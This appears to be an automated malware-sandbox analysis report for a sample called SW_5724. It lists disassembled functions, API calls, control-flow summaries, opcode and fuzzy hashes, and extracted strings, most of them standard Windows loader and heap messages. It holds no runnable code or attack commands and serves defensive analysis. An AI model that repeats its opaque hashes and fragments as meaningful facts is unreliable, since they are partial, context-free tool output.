                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_400000_SW_5724.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: 174EBI30$174EBI30
                                                                                  • API String ID: 1836367815-962170130
                                                                                  • Opcode ID: 4ecf56fba355219f401ddbbca44f987cd04b3eaaab059dd1a3329575f73ce29d
                                                                                  • Instruction ID: 35238bee879f9cb4b8c33a7d52a63e84c9799adef20dca56b86e1aa432f083fb
                                                                                  • Opcode Fuzzy Hash: 4ecf56fba355219f401ddbbca44f987cd04b3eaaab059dd1a3329575f73ce29d
                                                                                  • Instruction Fuzzy Hash: 42113AB6E012147AD711AA908C829EF773CEA927B4B10416AFA14E7241E63C4E824BE5
                                                                                  Function 00414163 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 69 414163-414195 call 42eab3 call 42f4c3 74 41419b-4141cd call 4046a3 call 425063 69->74 75 414196 call 417913 69->75 81 4141ed-4141f3 74->81 82 4141cf-4141de PostThreadMessageW 74->82 75->74 82->81 83 4141e0-4141ea 82->83 83->81
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(174EBI30,00000111,00000000,00000000), ref: 004141DA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_400000_SW_5724.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: 174EBI30$174EBI30
                                                                                  • API String ID: 1836367815-962170130
                                                                                  • Opcode ID: 4846da65e6cecb9ba5e53dbb1fdfa6a66c03f359dfcd8300b4ab8b61d39b8611
                                                                                  • Instruction ID: eabf58b107c7c6da68bb626667c27e82debd11fa10f39ea43f99fe1032a0b2d9
                                                                                  • Opcode Fuzzy Hash: 4846da65e6cecb9ba5e53dbb1fdfa6a66c03f359dfcd8300b4ab8b61d39b8611
                                                                                  • Instruction Fuzzy Hash: 0F0104B5D0111C7ADB10AAE19C81DEFBB7CEF41398F448069FA04B7241D6784F468BA5
                                                                                  Function 0042CC93 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 84 42cc93-42ccd4 call 4046f3 call 42db83 RtlFreeHeap
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CCCF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_400000_SW_5724.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID: dfA
                                                                                  • API String ID: 3298025750-2195916745
                                                                                  • Opcode ID: c037948d9f93848298b9a3e15d9612d9743a7ffaddaf356af887b74fbf4664e6
                                                                                  • Instruction ID: 9badaf320af6d19ba30922152393b4c4b817bbc5f8a679b733ed37b1423509a0
                                                                                  • Opcode Fuzzy Hash: c037948d9f93848298b9a3e15d9612d9743a7ffaddaf356af887b74fbf4664e6
                                                                                  • Instruction Fuzzy Hash: 1AE092B22002047BC614EE59DC41FAB77ADEFC5714F000419FA08A7241D774B910C7B8
                                                                                  Function 00417993 Relevance: 1.6, APIs: 1, Instructions: 117libraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 98 417993-4179a8 99 417951-417957 98->99 100 4179aa-4179b0 98->100 101 41795d-417971 call 42e093 99->101 102 417958 call 42fe93 99->102 103 4179b2-4179dc 100->103 104 4179dd 100->104 111 41798a-41798d 101->111 117 417973-417987 LdrLoadDll 101->117 102->101 103->104 106 417989 104->106 107 4179df-4179e8 104->107 106->111 108 4179ea-417a1e 107->108 109 417a4c-417a4f 107->109 112 417ab1-417ace call 42b8c3 109->112 113 417a51-417a57 109->113 113->112 117->111
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417985
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_400000_SW_5724.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: a09e5713e9d6b45433918cc3a871e07cdb4f2e923259d934ad70dc4dfbac3a66
                                                                                  • Instruction ID: 8e2e7eca41e65fd1a7cba35ee64e9ef6a7c9e77ccfa9966d1d506597efe0b44c
                                                                                  • Opcode Fuzzy Hash: a09e5713e9d6b45433918cc3a871e07cdb4f2e923259d934ad70dc4dfbac3a66
                                                                                  • Instruction Fuzzy Hash: F031DEF6648206FAC711DB749C42FCBBFB8EB41300F14426BE8098B142E634D54A87E9
                                                                                  Function 0042CC43 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 135 42cc43-42cc87 call 4046f3 call 42db83 RtlAllocateHeap
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(?,0041E731,?,?,00000000,?,0041E731,?,?,?), ref: 0042CC82
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_400000_SW_5724.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 1e5971ee8760370d2dffdb4a0dfdf9e4f37099d36bec83528a813842de99e206
                                                                                  • Instruction ID: b2575036bf5dcaf5ff4b630ad3bd5a7365a46971e8e9f3b7bb08ed937dad50fb
                                                                                  • Opcode Fuzzy Hash: 1e5971ee8760370d2dffdb4a0dfdf9e4f37099d36bec83528a813842de99e206
                                                                                  • Instruction Fuzzy Hash: AAE06DB16002187BD714EF59EC41F9B77ACEFC6714F00441AFA09A7281D670B91086B8
                                                                                  Function 0042CCE3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 145 42cce3-42cd1c call 4046f3 call 42db83 ExitProcess
                                                                                  APIs
                                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,2CB6EB11,?,?,2CB6EB11), ref: 0042CD17
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_400000_SW_5724.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitProcess
                                                                                  • String ID:
                                                                                  • API String ID: 621844428-0
                                                                                  • Opcode ID: 1d795ddcb259808af3833f40a7934c66429373065a909e14572eba194b240543
                                                                                  • Instruction ID: 2142ba6bb06545a36fbe1fcd062f4bba4f286f26750a8e7fd8a17f6b67c315a7
                                                                                  • Opcode Fuzzy Hash: 1d795ddcb259808af3833f40a7934c66429373065a909e14572eba194b240543
                                                                                  • Instruction Fuzzy Hash: 34E086712006187BC510EA6ADC41FDBB75DDFC5724F014519FA08A7245CAB5B91187F4
                                                                                  Function 01A92C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 150 1a92c0a-1a92c0f 151 1a92c1f-1a92c26 LdrInitializeThunk 150->151 152 1a92c11-1a92c18 150->152
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 47bbb192bcc52ae7409e4fa2ab5ebad198f8ff64c0a450db3b13ac67ecf6dadb
                                                                                  • Instruction ID: 687cafb878455f93b81e9cab684f3b9eb59af783206e16acaa47495294b45565
                                                                                  • Opcode Fuzzy Hash: 47bbb192bcc52ae7409e4fa2ab5ebad198f8ff64c0a450db3b13ac67ecf6dadb
                                                                                  • Instruction Fuzzy Hash: 5EB09B71D015C5D5DF12E7A44608717794077D0701F56C072D2030751F473CD5D1E275

                                                                                  Non-executed Functions

                                                                                  Function 01AD2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2160512332
                                                                                  • Opcode ID: 49b8c1db5473874db014735e1e6df7f4bc171d15e586d4e8a77f974eff018a15
                                                                                  • Instruction ID: 1fd36e08e9348a8a31dea1e7202a87df2b953d1bdefd9369e7cfbc1dff3f0959
                                                                                  • Opcode Fuzzy Hash: 49b8c1db5473874db014735e1e6df7f4bc171d15e586d4e8a77f974eff018a15
                                                                                  • Instruction Fuzzy Hash: 2D926E71608B42AFE721DF28C940B6BB7E8BF84754F04492EFA96D7251D770E844CB92
                                                                                  Function 01A88620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • undeleted critical section in freed memory, xrefs: 01AC542B
                                                                                  • Address of the debug info found in the active list., xrefs: 01AC54AE, 01AC54FA
                                                                                  • double initialized or corrupted critical section, xrefs: 01AC5508
                                                                                  • Invalid debug info address of this critical section, xrefs: 01AC54B6
                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01AC5543
                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AC54CE
                                                                                  • 8, xrefs: 01AC52E3
                                                                                  • Critical section address, xrefs: 01AC5425, 01AC54BC, 01AC5534
                                                                                  • Thread identifier, xrefs: 01AC553A
                                                                                  • Critical section debug info address, xrefs: 01AC541F, 01AC552E
                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AC54E2
                                                                                  • Critical section address., xrefs: 01AC5502
                                                                                  • corrupted critical section, xrefs: 01AC54C2
                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AC540A, 01AC5496, 01AC5519
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                  • API String ID: 0-2368682639
                                                                                  • Opcode ID: 7360b4b0b7fb9cb7ef0f856b36f43c3b03f2ed05a7eb38af396eeb2125e8f7e0
                                                                                  • Instruction ID: 24e00db31eaa18ace63bea870a169cb5f499aa0f81ba8ea4feccd645d2d9949f
                                                                                  • Opcode Fuzzy Hash: 7360b4b0b7fb9cb7ef0f856b36f43c3b03f2ed05a7eb38af396eeb2125e8f7e0
                                                                                  • Instruction Fuzzy Hash: 5D81A9B0E00358BFDB20CF99C940BAEBBB5BB48B14F14421EF504B7281D7B9A944CB60
                                                                                  Function 01A829F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01AC2624
                                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 01AC261F
                                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01AC2498
                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01AC2506
                                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01AC2412
                                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01AC24C0
                                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01AC22E4
                                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01AC2409
                                                                                  • @, xrefs: 01AC259B
                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01AC25EB
                                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01AC2602
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                  • API String ID: 0-4009184096
                                                                                  • Opcode ID: ee929a4384019a29c5bdc9e65fb3009d06dffbda0d44f5d50ef6685f2639b325
                                                                                  • Instruction ID: 53ffbf09a7a7e5ba38d2bfaf008299c64d611f6d575b457936783a597b3092d0
                                                                                  • Opcode Fuzzy Hash: ee929a4384019a29c5bdc9e65fb3009d06dffbda0d44f5d50ef6685f2639b325
                                                                                  • Instruction Fuzzy Hash: 5C025FF5D002299FDB31DB54CD80BBAB7B8AF54704F0441EAE609A7241EB709E84CF69
                                                                                  Function 01AF8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                  • API String ID: 0-2515994595
                                                                                  • Opcode ID: 85f89eb40de26a407c65788211cdfc4144d8b0c5235c47bd1a21c2467e52b831
                                                                                  • Instruction ID: 5d7804cd1198ce6e31441495e2bd72b8661b4f666f28298d3f162278d786514b
                                                                                  • Opcode Fuzzy Hash: 85f89eb40de26a407c65788211cdfc4144d8b0c5235c47bd1a21c2467e52b831
                                                                                  • Instruction Fuzzy Hash: 7551E0716053119FD32ACF998944BABBBE8FF94340F14491DFA99C3280E778D649CB92
                                                                                  Function 01B00274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                  • API String ID: 0-1700792311
                                                                                  • Opcode ID: 77e572e526bca472377283b892c0482accfce33f1ea037fe53550d6a71eaa866
                                                                                  • Instruction ID: 305bf9ffaf4f7968df3fc0ffecadaefb40b8709ec092ca5f3dc63d798bec5efc
                                                                                  • Opcode Fuzzy Hash: 77e572e526bca472377283b892c0482accfce33f1ea037fe53550d6a71eaa866
                                                                                  • Instruction Fuzzy Hash: 29D1AA35500686EFDB2AEFA8C441BAEBFF1FF5A640F088099F4459B292C735D981CB14
                                                                                  Function 01AD89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • HandleTraces, xrefs: 01AD8C8F
                                                                                  • VerifierFlags, xrefs: 01AD8C50
                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 01AD8B8F
                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01AD8A67
                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01AD8A3D
                                                                                  • VerifierDlls, xrefs: 01AD8CBD
                                                                                  • VerifierDebug, xrefs: 01AD8CA5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                  • API String ID: 0-3223716464
                                                                                  • Opcode ID: cb2e1cd9cc155327482b86ada96c9be0d6b6ef2a90f9093d81a1d3aeda92c6b9
                                                                                  • Instruction ID: 04e89097951682c9b5eadb8ec27e024f79dddb4183054aa5604fc75c7b42ed1b
                                                                                  • Opcode Fuzzy Hash: cb2e1cd9cc155327482b86ada96c9be0d6b6ef2a90f9093d81a1d3aeda92c6b9
                                                                                  • Instruction Fuzzy Hash: 90912672645F12EFD731EF68C980B6B77A8BB94B14F058459FA826B291C738EC04C791
                                                                                  Function 01A5EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                  • API String ID: 0-1109411897
                                                                                  • Opcode ID: d12439765db4eeb1be832f8b12c92933aeed90376fe24b120f58151ccff01da9
                                                                                  • Instruction ID: aa932232977fc38f10e512839818a600f615c180923774569681c3949444af09
                                                                                  • Opcode Fuzzy Hash: d12439765db4eeb1be832f8b12c92933aeed90376fe24b120f58151ccff01da9
                                                                                  • Instruction Fuzzy Hash: 2CA24C70A096698FDBA4CF18CD987A9BBB5BF49304F1442D9D90EA7252DB349EC5CF00
                                                                                  Function 01A863FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-792281065
                                                                                  • Opcode ID: 92fbe29509f716490db8658be5c8b6d4dd63fc80a97e7dc1a2bd56b218a02ca9
                                                                                  • Instruction ID: 520e5efdced57e97345dd8dd4d66b6706a53dd53fbbc3c4663012d5d128d2d67
                                                                                  • Opcode Fuzzy Hash: 92fbe29509f716490db8658be5c8b6d4dd63fc80a97e7dc1a2bd56b218a02ca9
                                                                                  • Instruction Fuzzy Hash: F0913570B007159BEB39EF5CDA55FAE7BB2BF45B24F08402DE9486B282DB749801C794
                                                                                  Function 01A4645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01AA9A2A
                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01AA99ED
                                                                                  • LdrpInitShimEngine, xrefs: 01AA99F4, 01AA9A07, 01AA9A30
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01AA9A11, 01AA9A3A
                                                                                  • apphelp.dll, xrefs: 01A46496
                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01AA9A01
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-204845295
                                                                                  • Opcode ID: df539e9a2def3cef385d38d7e0c3878c90ed757a1c20df14e1d620d49d87a3b6
                                                                                  • Instruction ID: 00e2bee870937405fca2328d184c119ad87a5076e71f18ffd335fd73e18bca9f
                                                                                  • Opcode Fuzzy Hash: df539e9a2def3cef385d38d7e0c3878c90ed757a1c20df14e1d620d49d87a3b6
                                                                                  • Instruction Fuzzy Hash: B651A071208305AFE725DF28D991FAB7BE8FBC4648F44491EF5899B160DB30E905CB92
                                                                                  Function 01A8C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrpInitializeImportRedirection, xrefs: 01AC8177, 01AC81EB
                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 01AC8170
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01A8C6C3
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01AC8181, 01AC81F5
                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 01AC81E5
                                                                                  • LdrpInitializeProcess, xrefs: 01A8C6C4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                  • API String ID: 0-475462383
                                                                                  • Opcode ID: c839736a97b53cbe2af773f5c9056324d9a5231172f98675c11caf9aa3cc7f67
                                                                                  • Instruction ID: 7d882e1c857938ac389c88d63a551335596c007f3987e8b324b31733caf11268
                                                                                  • Opcode Fuzzy Hash: c839736a97b53cbe2af773f5c9056324d9a5231172f98675c11caf9aa3cc7f67
                                                                                  • Instruction Fuzzy Hash: 3131F571644342AFC224EF29DE45E1ABBE4FFD4B24F08056CF9856B291E720ED04C7A2
                                                                                  Function 01A82674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01AC219F
                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01AC21BF
                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 01AC2160, 01AC219A, 01AC21BA
                                                                                  • SXS: %s() passed the empty activation context, xrefs: 01AC2165
                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01AC2180
                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01AC2178
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A20000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_1a20000_SW_5724.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                  • API String ID: 0-861424205
                                                                                  • Opcode ID: 62034cbc0ac83d6400eba689957d1ac6e0798e28abdca7eb13e81e88bdd79bee
                                                                                  • Instruction ID: fbf415e2c94a743846847efa8b480b9944759ee75929a75a55edf59bd7986261
                                                                                  • Opcode Fuzzy Hash: 62034cbc0ac83d6400eba689957d1ac6e0798e28abdca7eb13e81e88bdd79bee
                                                                                  • Instruction Fuzzy Hash: 5431F67AF403157BE721AA9A8C45F6B7B78EBE5E50F09005EBB05B7140D2709A41C7A1
                                                                                  Function 01A9096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 01A92DF0: LdrInitializeThunk.NTDLL ref: 01A92DFA
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A90BA3
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A90BB6
